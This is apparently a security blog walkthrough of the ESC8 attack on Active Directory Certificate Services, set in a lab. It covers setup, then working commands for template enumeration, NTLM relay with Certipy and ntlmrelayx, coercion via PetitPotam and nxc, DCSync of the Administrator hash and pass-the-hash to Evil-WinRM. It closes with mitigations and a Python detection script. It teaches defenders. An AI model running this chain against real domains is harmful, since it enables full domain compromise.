Active Directory Certificate Attack

ADCS ESC8 – NTLM Relay to AD CS HTTP Endpoints

ESC8 is a critical vulnerability in Active Directory Certificate Services (ADCS) that targets web enrollment interfaces, making them vulnerable to NTLM relay attacks. If HTTPS is not enforced and the Certificate Authority (CA) supports client authentication or domain computer enrollment templates, attackers can exploit this to impersonate users and escalate privileges. This attack can target any domain machine, including domain controllers, allowing attackers to silently gain higher privileges and further compromise the network. Proper configuration and security measures are essential to prevent ESC8 exploitation.

Table of Contents

  • Overview of the ESC8 Attack
  • Prerequisites
  • Lab Setup

Enumeration & Exploitation

  • Method 1: Using Certipy

Post Exploitation

  • Interactive LDAP Shell as Domain Controller using Certipy
  • Method 2: Using Impacket-ntlmrelay
  • Lateral Movement & Privilege Escalation using Evil-Winrm

Mitigation

Overview of the ESC8 Attack

ESC8 is a critical Active Directory escalation path that exploits misconfigured AD Certificate Services (ADCS) Web Enrollment, using NTLM relay and authentication coercion to impersonate privileged accounts such as Domain Admins. It’s a post-exploitation attack that abuses vulnerable certificate templates and CA settings to escalate privileges quietly, often without triggering security defenses, and it doesn’t rely on malware or zero-day exploits.

ADCS Web Enrollment Architecture

Web Enrollment is an optional feature of ADCS that exposes an HTTP interface at /certsrv, allowing users to:

  • Request new certificates via a browser
  • Renew existing ones
  • Download CA certificates or CRLs

While convenient for internal users and devices, this web portal becomes a serious vulnerability when:

  • It accepts NTLM authentication over HTTP
  • The CA allows enrollment using highly privileged templates
  • There’s no protection against NTLM relay

How It Works:

  • A user submits a certificate request via the web interface.
  • The CA checks the requester’s permissions and certificate template.
  • If approved, the CA signs and issues a valid certificate.
  • The user can then use the certificate for authentication (Kerberos/PKINIT) or for tasks like S/MIME, EFS, etc.

Note: When NTLM authentication is allowed on the Web Enrollment page, it opens the door to NTLM relay attacks, especially if paired with coercion tools like PetitPotam.

ADCS Servers Vulnerable to ESC8 Typically Meet These Conditions:

  • Web Enrollment is enabled (http://192.168.1.10/certsrv/)
  • The Request Disposition on the certificate template is set to Issue (i.e., automatically approve requests)
  • The CA does not enforce strong requestor validation (e.g., no manager approval, no subject name restrictions)

Prerequisites

  • Two Windows Server 2019 domain controllers (DC1 and DC2) in a domain that supports PKINIT.
  • The domain must have Active Directory Certificate Services and a Certificate Authority configured, with Web Enrollment enabled on DC2.
  • Kali Linux with the required tools installed
  • Tools: Evil-Winrm, certipy-ad, nxc, PetitPotam

Lab Setup

Before we jump into the attack walkthrough, make sure DC2 (the target server) has Active Directory Certificate Services (ADCS) installed with the Web Enrollment role enabled. This is critical, as ESC8 specifically abuses the /certsrv HTTP interface provided by this component.

To install ADCS with Web Enrollment:
  • First, open Server Manager > Add Roles and Features.


Choose Installation Type
  • On the “Installation Type” screen, select Role-based or feature-based installation.
  • Click Next.

Select the Destination Server
  • Select your local server (ignite.local) from the list.
  • Click Next.


Select Server Roles
  • Scroll down and find: Active Directory Certificate Services
  • A pop-up will appear to add dependencies.
  • Click Add Features, then click Next.

After choosing the ADCS role, you’ll be prompted to select which role services to install.

Check:

  • Certification Authority Web Enrollment

Note: Web Enrollment is essential for ESC8 exploitation, as it exposes the vulnerable HTTP interface.

Click Next.

Install Required Features
  • On the Features page, accept the defaults and click Next.


Confirm and Install
  • On the confirmation screen, review your selections.
  • Optional: Check the box to restart automatically if required.

  • Then, click Install and wait for the installation to complete.


Configure ADCS Post-Installation

Once the installation is complete, a yellow flag will appear in Server Manager.

  • Click “Configure Active Directory Certificate Services on this server” to launch the Post-Deployment Configuration Wizard.

In the wizard:

  • Keep the current user if they are a Domain Admin (Administrator in this case).


Select the following roles to configure:
  • Certification Authority Web Enrollment

  • Confirm the installation path and click Configure.

On the result screen:
  • If the setup is correct, you will see “Configuration Succeeded.”
  • Click Close.


When successful, you should be able to browse to: http://192.168.1.10/certsrv

Now that our target environment is properly configured, let’s jump into the attack walkthrough.

Enumeration & Exploitation

Method 1: Using Certipy

This method identifies exploitable certificate templates, coerces a domain controller to authenticate, obtains a certificate for it through Certipy’s relay, and uses that certificate for authentication.

Find Vulnerable Templates with Certipy

With credentials for a regular domain user (raj@ignite.local), use Certipy to find templates that allow abuse:

certipy find -u raj@ignite.local -p 'Password@1' -dc-ip 192.168.1.4 -vulnerable -enabled

The command queries AD CS for enabled templates, flags known vulnerabilities, and reports configuration details such as a template with the DomainController EKU that is auto-issued and enrollable by low-privileged users, combined with Web Enrollment enabled on the CA.

Let’s read the output, which Certipy also saves in .txt and .json format.


Note: If Web Enrollment is enabled without approval or identity validation requirements, the setup is vulnerable to ESC8.

Start Certipy Relay to the CA

On Kali, set up Certipy to listen and relay incoming NTLM traffic to the CA:

certipy-ad relay -target 192.168.1.10 -template DomainController

Coerce Authentication from DC1 (PetitPotam)

Use PetitPotam to force DC1 to authenticate to our Kali listener:

python PetitPotam.py -u raj -p Password@1 192.168.1.11 192.168.1.4


What happened?

PetitPotam abuses MS-EFSRPC to coerce DC1 into sending an NTLM authentication to our listener. Certipy then relays that authentication to the CA and requests a certificate for DC1$.

Note: This is the core of the ESC8 attack chain, coercion + relay = impersonation.

Relay and Receive Certificate for DC1$

After triggering authentication from DC1 via PetitPotam, the NTLM credentials are relayed to the ADCS Web Enrollment interface (http://192.168.1.10/certsrv), submitting a request using the DomainController template for DC1.

In short, Certipy relays DC1’s authentication to the CA and requests a certificate impersonating DC1$.

certipy-ad relay -target 192.168.1.10 -template DomainController

We now have a .pfx file that lets us authenticate as the domain controller (DC1$).

Authenticate Using Issued Certificate

Certipy outputs a .pfx file for the DC1$ account. Use it to authenticate:

certipy-ad auth -pfx DC.pfx -dc-ip 192.168.1.4


We now hold the NTLM hash for DC1$.

Post Exploitation

Interactive LDAP Shell as Domain Controller Using Certipy

This uses the dc1.pfx certificate to authenticate to the domain controller via Kerberos, granting access to an interactive LDAP shell as the DC1$ machine account.

certipy-ad auth -pfx dc1.pfx -dc-ip 192.168.1.4 -ldap-shell

Note: We’re not simulating or spoofing; we’re authenticating as a trusted machine account with a legitimate, CA-signed certificate, giving us native, protocol-level access to Active Directory through the LDAP shell.

Method 2: Using Impacket-NTLMRelayx

This method uses a different toolchain but follows the same logic: coercion + relay + certificate = impersonation.

impacket-ntlmrelayx -t http://192.168.1.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController


First, it relays incoming SMB authentication to the Web Enrollment interface on DC2. Then, it automatically requests a certificate using the DomainController template. Finally, upon success, it stores the certificate and key for later use.

Coerce DC1 to Authenticate with nxc

nxc smb 192.168.1.4 -u raj@ignite.local -p Password@1 -d ignite.local -M coerce_plus -o LISTENER=192.168.1.11

This command targets DC1, forces an SMB authentication attempt to the relay listener on Kali, and uses the coerce_plus module, which triggers common coercion protocols such as MS-EFSRPC and MS-RPRN.

Note: Relay captures this and issues a certificate for DC1$, which you can convert into a .pfx file if needed.

Certificate Issued and Saved via ntlmrelayx

After running the NTLM relay and successfully coercing DC1 using nxc, the ntlmrelayx output confirms that the relay was successful and that the CA issued a PKCS#12 certificate, which is saved as DC1$.pfx.

Authenticate as DC1$ with Issued Certificate

We use the issued certificate for DC1$ to authenticate over SMB to DC2, effectively impersonating the domain controller.

nxc smb 192.168.1.10 --pfx-cert dc1.pfx -u "dc1$"


Extract Administrator Hash with DCSync

We perform DCSync as DC1 to extract the NTLM hash of the Administrator account.

nxc smb 192.168.1.10 --pfx-cert dc1.pfx -u "dc1$" --ntds --user Administrator

Lateral Movement & Privilege Escalation using Evil-Winrm

Using the Administrator hash obtained via DCSync, pass the hash to DC1 with Evil-WinRM:

evil-winrm -i 192.168.1.4 -u administrator -H 32196b56ffe6f45e294117b91a83bf38


We now have a remote, interactive shell as Domain Admin on DC1, all without touching a password.

Mitigation

  • Disable Web Enrollment if not needed, or restrict access to internal users only.
  • Enforce HTTPS and disable or restrict NTLM.
  • Use Kerberos-only authentication and set LmCompatibilityLevel = 5 to refuse NTLMv1.
  • Harden certificate templates by removing Authenticated Users from enroll/auto-enroll and requiring Manager Approval.
  • Restrict CA access and limit template permissions to privileged groups.
  • Audit sensitive templates like DomainController and Administrator.
  • Block coercion vectors by disabling MS-EFSRPC, MS-RPRN and MS-FSRVP and by filtering RPC traffic with Windows Firewall.
  • Enable CA audit logs and monitor for machine cert enrollments and PKINIT events.
  • Enable Extended Protection for Authentication (EPA) to protect /certsrv in IIS.
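As an added defender-side example (not part of the original walkthrough), the following Python puts the monitoring bullet above into practice: a Kerberos TGT request event (4768) with Pre-Authentication Type 16 means a certificate was used to log on, and a machine account such as DC1$ doing that from any address other than its own host is exactly what a relayed ESC8 certificate produces. The event text, the allow-list of expected hosts and the CA name are constructed assumptions.

```python
# Hypothetical allow-list: source addresses each machine account may log on from.
EXPECTED_HOSTS = {"DC1$": {"192.168.1.4"}, "DC2$": {"192.168.1.10"}}
PA_PK_AS_REQ = "16"  # Pre-Authentication Type 16 in event 4768: a certificate was used

# Constructed sample 4768 (Kerberos TGT request) events, not real logs; CA name is made up.
SAMPLE_EVENTS = """\
EventID: 4768
Account Name: raj
Pre-Authentication Type: 2
Client Address: ::ffff:192.168.1.50
---
EventID: 4768
Account Name: DC1$
Pre-Authentication Type: 16
Certificate Issuer Name: ignite-DC2-CA
Client Address: ::ffff:192.168.1.11
---
EventID: 4768
Account Name: DC1$
Pre-Authentication Type: 16
Certificate Issuer Name: ignite-DC2-CA
Client Address: ::ffff:192.168.1.4
"""


def parse_events(text):
    """Split the text into events and each event into 'Field: value' pairs."""
    events = []
    for chunk in text.split("---"):
        fields = {}
        for line in chunk.strip().splitlines():
            key, _, value = line.partition(":")  # split on the first colon only
            fields[key.strip()] = value.strip()
        if fields:
            events.append(fields)
    return events


def suspicious_pkinit(events, expected=EXPECTED_HOSTS):
    """Return (account, source, issuer) for machine-account PKINIT logons from unlisted hosts."""
    hits = []
    for ev in events:
        if ev.get("EventID") != "4768" or ev.get("Pre-Authentication Type") != PA_PK_AS_REQ:
            continue
        account = ev.get("Account Name", "")
        if not account.endswith("$"):
            continue  # only machine accounts, the identities ESC8 impersonates
        # Windows logs IPv4 clients as ::ffff:a.b.c.d; compare the plain IPv4 form.
        src = ev.get("Client Address", "").removeprefix("::ffff:")
        if src not in expected.get(account, set()):
            hits.append((account, src, ev.get("Certificate Issuer Name", "")))
    return hits
```

Running suspicious_pkinit(parse_events(SAMPLE_EVENTS)) flags only the DC1$ logon from 192.168.1.11, the Kali address in this lab, while the same account's PKINIT logon from its own host passes.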

Author: MD Aslam is a dynamic Information Security leader committed to driving security excellence and mentoring teams to strengthen security across products, networks, and organizations.